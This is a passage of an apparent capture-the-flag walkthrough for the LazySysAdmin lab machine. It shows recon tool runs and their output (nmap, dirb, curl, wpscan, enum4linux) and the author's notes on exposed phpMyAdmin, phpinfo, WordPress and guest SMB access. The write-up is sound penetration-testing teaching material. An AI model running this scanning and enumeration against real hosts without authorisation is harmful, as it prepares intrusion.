CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| LAZYSYSADMIN<00> Flags: <unique><active></span></pre><pre class=" CodeMirror-line 
" role="presentation"><span role="presentation" style="padding-right: 0.1px;">| LAZYSYSADMIN<03> Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| LAZYSYSADMIN<20> Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| WORKGROUP<00> Flags: <group><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_ WORKGROUP<1e> Flags: <group><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| smb-os-discovery: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| OS: Windows <span class="cm-number">6</span>.1 (Samba <span class="cm-number">4</span>.3.11-Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Computer name: lazysysadmin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| NetBIOS computer name: LAZYSYSADMIN\x<span class="cm-number">00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Domain name: \x<span class="cm-number">00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| FQDN: lazysysadmin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_ System time: <span class="cm-number">2018</span><span class="cm-attribute">-01-31T22</span>:55:23<span class="cm-operator">+</span><span class="cm-number">10</span>:00</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;">| smb-security-mode: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| account_used: guest</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| authentication_level: user</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| challenge_response: supported</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_ message_signing: disabled (dangerous, but default)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_smbv2-enabled: Server supports SMBv2 protocol</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">TRACEROUTE</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">HOP RTT ADDRESS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">1</span> <span class="cm-number">0</span>.50 ms LazySysAdmin.lan (192.168.0.100)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">NSE: Script Post-scanning.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating NSE at <span class="cm-number">20</span>:55</span></pre><pre class=" CodeMirror-line " role="presentation"><span 
role="presentation" style="padding-right: 0.1px;">Completed NSE at <span class="cm-number">20</span>:55, <span class="cm-number">0</span>.00s elapsed</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating NSE at <span class="cm-number">20</span>:55</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Completed NSE at <span class="cm-number">20</span>:55, <span class="cm-number">0</span>.00s elapsed</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Read data files from: /usr/bin/../share/nmap</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Nmap <span class="cm-keyword">done</span>: <span class="cm-number">1</span> IP address (1 host up) scanned <span class="cm-keyword">in</span> <span class="cm-number">31</span>.19 seconds</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> Raw packets sent: <span class="cm-number">11045</span> (487.680KB) | Rcvd: <span class="cm-number">11034</span> (442.816KB)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 2032px;"></div><div class="CodeMirror-gutters" style="display: none; height: 2062px;"></div></div></div></pre><p>Comparing the two scans: masscan enumerates open ports much faster than nmap, but identifying the service and version behind each port needs nmap's service detection. The results show ports 22 (OpenSSH 6.6.1p1), 80 (Apache 2.4.7 serving a site titled Backnode), 139 and 445 (Samba 4.3.11), 3306 (MySQL, reported as unauthorized, meaning the server answers but refuses connections from our host) and 6667 (InspIRCd) open. The SMB host scripts also show that a guest session was accepted and that message signing is disabled, which makes Samba worth enumerating later.</p><p>Start with the web service and use dirb to brute-force the directories present on the target (dirb installation steps are appended at the end of the article).</p><pre class="md-fences md-end-block" lang="bash">➜ evilk0 ./dirb http://192.168.0.100 wordlists/common.txt -o /home/evilk0/Desktop/result.txt
Usage: ./dirb TARGET_URL WORDLIST -o OUTPUT_FILE</pre><p>While the tools run, probe for exploitable points by hand. The site itself shows nothing of interest, but robots.txt lists four disallowed directories, and each of them has directory listing (Apache autoindex) enabled, so their contents can be browsed directly. Nothing immediately usable turned up in them.</p><p><a href='http://192.168.0.100/robots.txt' target='_blank' class='url'>http://192.168.0.100/robots.txt</a></p><pre class="md-fences md-end-block" lang="http"> <div class="CodeMirror 
cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-error">User-agent: *</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /old/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /test/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /TR2/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span 
class="cm-string"> /Backnode_files/</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 123px;"></div><div class="CodeMirror-gutters" style="display: none; height: 153px;"></div></div></div></pre><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/1.png' alt='1' referrerPolicy='no-referrer' /></p><p>Grabbing the web server's response headers with curl confirms the middleware is Apache 2.4.7 on Ubuntu. Together with OpenSSH 6.6.1p1 from the nmap scan (and the PHP 5.5.9 build that wpscan reports below), these are the package versions shipped with Ubuntu 14.04 (Trusty), which tells you what to expect from the underlying system later on.</p><pre class="md-fences md-end-block" lang="bash">➜ evilk0 curl -I 192.168.0.100

HTTP/1.1 200 OK
Date: Wed, 31 Jan 2018 13:01:20 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Sun, 06 Aug 2017 05:02:15 GMT
ETag: "8ce8-5560ea23d23c0"
Accept-Ranges: bytes
Content-Length: 36072
Vary: Accept-Encoding
Content-Type: text/html</pre><p>Back to the dirb results: the target runs WordPress under /wordpress/ and also exposes phpMyAdmin under /phpmyadmin/. Two other entries deserve a manual look: /info.php returns 200 with a 77 KB body (a file of that name and size is usually a phpinfo() page, which leaks the PHP build, loaded modules and filesystem paths), and /server-status returns 403, so mod_status is loaded but access to it is restricted.</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div 
class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜ dirb222 <span class="cm-builtin">cat</span> /home/evilk0/Desktop/result.txt | <span class="cm-builtin">grep</span> <span class="cm-string">"^+"</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/index.html (CODE:200|SIZE:36072)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/info.php (CODE:200|SIZE:77257)</span></pre><pre class=" CodeMirror-line " role="presentation"><span 
role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/robots.txt (CODE:200|SIZE:92)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/server-status (CODE:403|SIZE:293)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/index.php (CODE:200|SIZE:8262)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/libraries (CODE:403|SIZE:300)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/phpinfo.php (CODE:200|SIZE:8264)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/setup (CODE:401|SIZE:459)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/index.php (CODE:301|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span 
class="cm-operator">+</span> http://192.168.0.100/javascript/jquery/jquery (CODE:200|SIZE:252879)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/javascript/jquery/version (CODE:200|SIZE:5)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 560px;"></div><div class="CodeMirror-gutters" style="display: none; height: 590px;"></div></div></div></pre><p>wpscan results. Besides the version (WordPress 4.8.5 with the Twenty Fifteen 1.8 theme), three findings matter for what follows: user registration is enabled, the XML-RPC endpoint is reachable (it accepts authenticated method calls, so it is a common target for password guessing), and directory listing is enabled for wp-content/uploads/ and wp-includes/.</p><pre class="md-fences md-end-block" lang="" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@kali:~# wpscan 
http://192.168.0.100/wordpress</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">_______________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> __ _______ _____ </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> \ \ / / __ \ / ____| </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> \ /\ / | | ____) | (__| (_| | | | |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> \/ \/ |_| |_____/ \___|\__,_|_| |_|</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> WordPress Security Scanner by the WPScan Team </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> Version 2.9.3</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> Sponsored by Sucuri - https://sucuri.net</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_</span></pre><pre class=" CodeMirror-line " role="presentation"><span 
role="presentation" style="padding-right: 0.1px;">_______________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] URL: http://192.168.0.100/wordpress/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Started: Thu Feb 1 01:37:20 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] The WordPress 'http://192.168.0.100/wordpress/readme.html' file exists exposing a version number</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: LINK: <http://192.168.0.100/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] 
Registration is enabled: http://192.168.0.100/wordpress/wp-login.php?action=register</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] XML-RPC Interface available under: http://192.168.0.100/wordpress/xmlrpc.php</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Upload directory has directory listing enabled: http://192.168.0.100/wordpress/wp-content/uploads/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Includes directory has directory listing enabled: http://192.168.0.100/wordpress/wp-includes/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] WordPress version 4.8.5 (Released on 2018-01-16) identified from meta generator, links opml</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] WordPress theme in use: twentyfifteen - v1.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Name: twentyfifteen - v1.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> | Last updated: 2017-11-16T00:00:00.000Z</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> | Location: 
http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> | Readme: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/readme.txt</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] The version is out of date, the latest version is 1.9</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> | Style URL: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/style.css</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> | Theme Name: Twenty Fifteen</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> | Theme URI: https://wordpress.org/themes/twentyfifteen/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. 
Twenty Fifteen's simple,...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> | Author: the WordPress team</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> | Author URI: https://wordpress.org/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Enumerating plugins from passive detection ...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] No plugins found</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Finished: Thu Feb 1 01:37:24 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Requests Done: 356</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Memory used: 37.98 MB</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Elapsed time: 00:00:04</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 1273px;"></div><div class="CodeMirror-gutters" style="display: none; height: 1303px;"></div></div></div></pre><p> </p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/6.png' alt='6' referrerPolicy='no-referrer' /></p><p>enum4linux 192.168.0.100</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: 
unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb <span class="cm-number">1</span> <span class="cm-number">00</span>:46:08 <span class="cm-number">2018</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Target Information |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;"> <span class="cm-operator">==========================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Target ........... <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">RID Range ........ <span class="cm-number">500</span><span class="cm-attribute">-550</span>,1000-1050</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Username ......... <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Password ......... <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Enumerating Workgroup/Domain on <span class="cm-number">192</span>.168.0.100 |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got domain/workgroup name: WORKGROUP</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Nbtstat Information <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Looking up status of <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>LAZYSYSADMIN <00> <span class="cm-attribute">-</span> B <ACTIVE> Workstation Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>LAZYSYSADMIN <03> <span class="cm-attribute">-</span> B <ACTIVE> Messenger Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>LAZYSYSADMIN <20> <span class="cm-attribute">-</span> B <ACTIVE> File Server Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>WORKGROUP <00> <span class="cm-attribute">-</span> <GROUP> B <ACTIVE> Domain/Workgroup Name</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>WORKGROUP <1e> <span class="cm-attribute">-</span> <GROUP> B <ACTIVE> Browser Service Elections</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>MAC Address <span class="cm-operator">=</span> <span class="cm-number">00</span><span class="cm-attribute">-00-00-00-00-00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Session Check on <span class="cm-number">192</span>.168.0.100 |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Server <span 